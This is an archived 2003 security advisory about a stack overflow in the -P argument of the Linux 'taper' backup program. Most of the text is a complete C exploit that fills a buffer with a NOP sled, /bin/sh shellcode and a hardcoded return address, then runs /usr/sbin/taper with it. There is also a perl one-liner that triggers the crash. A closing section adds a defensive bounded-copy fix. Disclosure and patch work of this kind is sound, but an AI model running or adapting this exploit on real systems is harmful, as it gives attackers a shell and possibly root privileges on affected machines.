
taper.txt

Date: 30 Oct 2003
Reported by: Polygrithm
Type: packetstorm
Source: packetstormsecurity.com

Stack overflow vulnerability in Taper program on Linux potentially impacting multiple distributions.

Code
`  
  
Hi,  
There is a stack overflow vulnerability in the taper program of Linux   
7.3 (maybe others).  
On Linux 7.3 it's not suid by default, but I don't know about other distros/versions;   
it may be suid on others.  
suid on others..  
  
Advisory:  
  
------------------------------------------------------------------------------------------------------------------------------  
gEEkz-advisory  
NrAziz(c) 2003  
nraziz_at_geekz_nl  
polygrithm_at_hotmail  
http://geekz.nl  
  
--{0x01 Introduction:  
  
Taper is a user friendly archive program especially designed  
for backing up to tape drives. It also supports backing up to files  
on a hard disk.  
  
--{0x02 Vulnerability:  
  
taper has a vulnerability in its argument to -P. By giving a large  
string it overwrites the eip.  
E.g. taper `perl -e 'print "A" x 2708'` overwrites the eip. It may have   
other possible vulnerabilities because  
of the usage of many strcpy's. Taper by default is non-suid on Linux   
7.3. However, if it's suid  
on any other distro/version please let me know.  
  
--{0x03 Greetz:  
  
To gEEkz team,rave,gorny,and other m8s  
  
------------------------------------------------------------------------------------------------------------------------------  
  
Exploit:  
  
------------------------------------------------------------------------------------------------------------------------------  
/* gEEkz-taper-xploit */  
/*  
* Copyright(C) 2003 NrAziz  
* nraziz^at^geekz^nl  
*/  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>    /* memset, memcpy, strlen */  
#include <sys/types.h> /* u_long */  
#include <unistd.h>    /* execl */  
  
/* /bin/sh */  
char shellcode[]=  
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"  
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"  
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"  
"\x80\xb0\x01\x31\xdb\xcd\x80";  
#define B_SIZE 2708  
int main(int argc,char **argv)  
{  
char buffer[B_SIZE+1]; /* +1 so the terminating NUL written below stays in bounds */  
int i;  
u_long ret=0xbffff250;  
  
/* layout: NOP fill, then shellcode, then the 4-byte return address */  
memset(buffer,0x90,B_SIZE-strlen(shellcode)-4);  
buffer[B_SIZE-4]=(ret & 0x000000ff);  
buffer[B_SIZE-3]=(ret & 0x0000ff00)>>8;  
buffer[B_SIZE-2]=(ret & 0x00ff0000)>>16;  
buffer[B_SIZE-1]=(ret & 0xff000000)>>24;  
buffer[B_SIZE-0]=0;  
memcpy(buffer+B_SIZE-strlen(shellcode)-4,shellcode,strlen(shellcode));  
  
execl("/usr/sbin/taper","taper","-P",buffer,(char *)0);  
return 0;  
}  
  
  
  
---------------------------------------------------------------------------------------------------------------------------------------  
  
Regards,  
NrAziz  
  
  
`
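
The root cause the advisory points to, an unchecked `strcpy` of a command-line argument into a fixed-size buffer, goes away when the length is validated before the copy. The following is an added example, not code from taper or from the advisory; `copy_option`, `handle_pref_option`, `PREF_MAX` and the sample values are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the page does not give taper's real one. */
#define PREF_MAX 256

/* Unsafe pattern named in the advisory: strcpy(dst, arg) copies the whole
 * argument into a fixed stack buffer regardless of its length. */

/* Hardened copy: rejects (rather than truncates) an argument that does not
 * fit, so an over-long value becomes a usage error. Returns 0 or -1. */
int copy_option(char *dst, size_t dstsize, const char *arg)
{
    const char *end;

    if (dst == NULL || arg == NULL || dstsize == 0)
        return -1;
    /* Look for the NUL within the first dstsize bytes only. */
    end = memchr(arg, '\0', dstsize);
    if (end == NULL) {           /* argument plus NUL exceeds dstsize */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, arg, (size_t)(end - arg) + 1);   /* includes the NUL */
    return 0;
}

/* Hypothetical handler standing in for the program's -P processing. */
int handle_pref_option(const char *arg, char *out, size_t outsize)
{
    int rc = copy_option(out, outsize, arg);
    if (rc != 0)
        fprintf(stderr, "-P argument rejected (limit %zu bytes)\n",
                outsize ? outsize - 1 : 0);
    return rc;
}

int main(void)
{
    char pref[PREF_MAX];
    char big[2709];   /* constructed input: 2708 bytes, as in the advisory */

    memset(big, 'A', 2708);
    big[2708] = '\0';
    printf("short value: %d\n", handle_pref_option("sample", pref, sizeof pref));
    printf("2708 bytes:  %d\n", handle_pref_option(big, pref, sizeof pref));
    return 0;
}
```

Rejecting the over-long value instead of silently truncating it keeps the program from acting on a partial argument.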
